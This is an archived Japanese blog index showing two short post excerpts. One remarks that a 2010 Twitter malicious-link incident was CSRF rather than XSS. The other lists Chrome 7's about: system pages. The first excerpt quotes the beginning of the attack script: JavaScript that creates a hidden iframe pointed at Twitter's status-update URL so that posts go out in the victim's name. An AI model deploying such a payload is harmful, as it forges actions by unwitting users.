2010-09-27から1日間の記事一覧

twitterでCSRFがあったらしい

web

Twitterでまた悪質リンクが横行――解決済み(ITmedia) 記事はXSSタグが付いているが、実際の攻撃はCSRFのようだ。 <script type="text/javascript"> var el1 = document.createElement('iframe'); el1.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20"…

chromeのシステムページ(2)

chrome 7の追加システムページ前回の記事(chromeのシステムページ)とかぶるのですが about:aboutにアクセスすると「about:」ページのリストが表示されるようです. about:appcache-internals about:view-http-cache about:credits about:dns about:histogram…